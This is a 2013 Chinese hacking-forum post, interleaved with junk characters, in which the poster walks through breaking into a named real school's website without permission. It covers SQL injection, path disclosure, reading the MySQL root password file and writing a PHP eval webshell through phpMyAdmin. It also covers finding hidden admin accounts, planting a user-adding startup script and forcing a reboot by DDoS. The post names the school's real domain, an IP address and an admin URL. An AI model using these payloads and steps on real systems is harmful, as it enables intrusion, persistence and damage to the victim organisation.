找回密码
 立即注册
查看: 3755|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
) }, C$ P( H* U+ Y2 ~8 Z6 e1 F8 J发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!# Y) s/ C# h! T- f& j2 r1 G4 w, m
# x4 |, p! L- {. H
* T7 T" q! T+ q3 S/ y$ H, e+ W

: U+ V/ S2 c$ d2 i6 n$ @0 T常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
2 V4 J5 V; w* {) K
# h& V0 q. P4 M; G5 c那么想可以直接写入shell ,getshell有几个条件:
* p/ B& E1 H4 p  O4 I
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF# p* F$ v" M1 ^; X' R; }1 f2 Q9 Y9 e. \9 R

' ?# T, \. \1 V: {试着爆绝对路径:" K) {) L" \. V/ F' w9 {
1./phpMyAdmin/index.php?lang[]=1  
1 {  K' L* }" v" \" {2./phpMyAdmin/phpinfo.php  & X; Z# v- M8 |6 n9 s6 A# G
3./load_file()  " f- j8 k+ A* _/ @" {7 v6 q! A: p
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  ( k0 j( R2 a2 S3 a% W% r
5./phpmyadmin/libraries/select_lang.lib.php  ; D  w- \; f2 u
6./phpmyadmin/libraries/lect_lang.lib.php  . {1 B7 X7 ]3 s: V6 z$ J" n) o
7./phpmyadmin/libraries/mcrypt.lib.php   
) k9 u- p+ U: g$ _# i0 }+ s* G9 [5 R8./phpmyadmin/libraries/export/xls.php  
, \( a% I% _4 v2 p- \% ?
) T' E  |; C( W1 O$ y均不行...........................
: ^  Q9 C/ t3 |- F3 U  T' r3 Y6 b/ s  Y) ^
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
* o/ ?- A0 \& P; l& R$ }! S- o- V. [, U
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin & T% i- g. P. F/ ^) z9 |0 z

3 X, N6 H4 E# N$ E! r默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败1 V  W6 @" T9 N3 i# W4 p% m4 F

: ?+ K, a  B2 y. n7 @敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........
! U$ J; K0 [# d1 S" O. ?; G
( i2 F: |2 r9 f4 Z想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 9 G4 Q1 L+ c1 h3 r
  E. v' |& L8 a2 G
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini : z  x$ L+ [, s" v9 m2 \! O( c* Z

4 w7 n* f7 c1 \' P$ }& @- Q: _; N自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD " H0 e5 ~' L# k% P" `9 \: x* N
7 ?7 V9 e5 H( [" Z3 {* M; V- k
成功读到root密码:" `9 `6 C- N. E  z$ e- z6 M
* \# [8 e1 O2 X  |$ w0 m* s
17---- r(0072)
/ b( ]7 |0 x+ {8 y18---- o(006f): v% \* o( E  V
19---- o(006f)4 y2 w' D7 z& j' g9 k* u; N$ t
20---- t(0074)/ A/ n: ]+ [( f7 X2 [: n& n
21---- *(002a)
; U) F. F$ O1 c: d  Z22---- 8(0038)) h2 `) J( B- f3 S. X, n) S/ f/ ?- J$ a
23---- 2(0032)7 o$ k2 i/ {8 [7 l8 y4 S1 m
24---- E(0045), _( a7 P1 j+ v- @9 O# Q; x
25---- 1(0031)$ h1 ]! b0 d; E$ t- k2 s% s1 G
26---- C(0043)/ V" |- h( k! N" F% `& B0 t. x7 B8 N
27---- 5(0035)2 W1 h$ X- |% S' U. ^1 r2 `
28---- 8(0038): q) ?* Q! p$ J, _
29---- 2(0032)
; O4 G. ]! S- v) C+ G; m30---- 8(0038)
! ?2 s, O* j$ \, T; I# \# n31---- A(0041)
. c/ G7 C5 f' n  s4 k32---- 9(0039)
0 @# Q+ N: [/ v3 t1 @$ E$ p33---- B(0042)
7 l" ~( s, s; H" G34---- 5(0035)8 r( E' i9 E' c0 x$ P. H
35---- 4(0034)1 J5 s) ]) _5 \0 z9 [) O
36---- 8(0038)
, j7 \2 K" A4 A% m% V; ^37---- 6(0036)* y, \# t( m& G) Z1 a- o
38---- 4(0034)5 G% J' Z  k/ f/ N' C  @) ^
39---- 9(0039)2 M4 D, f# q' e9 _
40---- 1(0031)
# Z" R* h+ ?& v9 a& h& |41---- 1(0031)& K1 p9 X( L" y/ H$ Q  O
42---- 5(0035)! h1 n  y: i8 e* Z. E! t# F" ^' s% K
43---- 3(0033)
1 M* w+ t% F$ [4 @' }1 D44---- 5(0035)
* c$ E- ~8 d7 g+ E& X( K" s* O45---- 9(0039)6 q/ A8 L/ \" X) q, l: b! P
46---- 8(0038)
1 j7 k' E0 q& D2 Z- Z* h47---- F(0046)
) F0 B$ S( }' v  X: s- }5 ^48---- F(0046)
7 ~% ]: S2 `; |' U49---- 4(0034)
! s& [+ ?" H# Q5 \& j( Y50---- F(0046)& T# H: A9 P' e
51---- 0(0030)& O( _) a5 R5 b5 ~1 ]
52---- 3(0033)/ \( {' |) N, R' U3 I
53---- 2(0032)2 f, n( G* I0 B
54---- A(0041)2 H* f! B" S- U! D! Z; O- z3 b
55---- 4(0034)
8 {8 D# A9 M7 R56---- A(0041)
9 Y) ?% \: Q- g* @$ G/ F57---- B(0042)
, D9 s8 C7 L1 d+ R: s- c& Z58---- *(0044)
# G. M8 c9 q4 |  P5 {; y59---- *(0035)
- z3 G! C0 P! J/ q" m0 w6 o  z) f60---- *(0041)
  h7 j5 ^* C9 ?! K61---- *0032)
1 X7 P  G+ b; g- s$ ]  C3 W% b/ s; x& Y3 M
解密后成功登陆phpmyamin
/ d+ {) ^! ^6 t( e" h; J! n4 M+ w                          . ]8 m+ q4 G' d- J8 W% [5 W+ j

* e( k; i* e# G9 H) Z6 X4 ?2 L                             
- l: p& ?9 w9 Z  e
) t) q+ V1 G, `0 }% G8 ?找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
2 E. X) S' r6 z: \! I
7 G2 _* K; _; l5 V4 `6 Y  u成功执行,拿下shell,菜刀连接:  v1 R* v/ d& a

, [7 c3 }. w4 r2 @- e# f2 K服务器不支持asp,aspx,php提权无果...................
0 r% g1 n6 j, ?! C7 X* X3 d7 _% e/ \
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:* @& h! a8 S- p0 e8 F
服务器上已经有个隐藏帐号了
; A) K# w3 ], e1 C5 M3 u; o$ `# L
别名     administrators
: |% `7 y$ z8 Y2 |1 \注释     管理员对计算机/域有不受限制的完全访问权
0 U  _5 S7 v; T3 _  z
成员

9 D- ~/ z/ P" @
-------------------------------------------------------------------------------  \! g3 W3 C! n, y' e7 ^/ N
admin2 _% t, _9 T# F, J
Administrator9 V- m2 d+ Y. u9 H  n1 R
slipper$2 `9 {* h' M. V, x! M3 ]5 h; K
sqluser$ u" z! b# H* a* H8 K( Y
命令成功完成。 " |3 @. S! ]+ [
+ R, x4 ?, B( e; @2 k
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
/ j" b1 z/ l5 z) l7 _- ?- X3 T: D$ y2 F
ddos服务器重启,不然就只能坐等服务器重启了...............................
7 E3 ?. c" c; l+ C( D0 }
' t7 \! H( a; ~; }* n: G. k  S      

, t- _4 ]) x& `8 o: J9 U* a

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表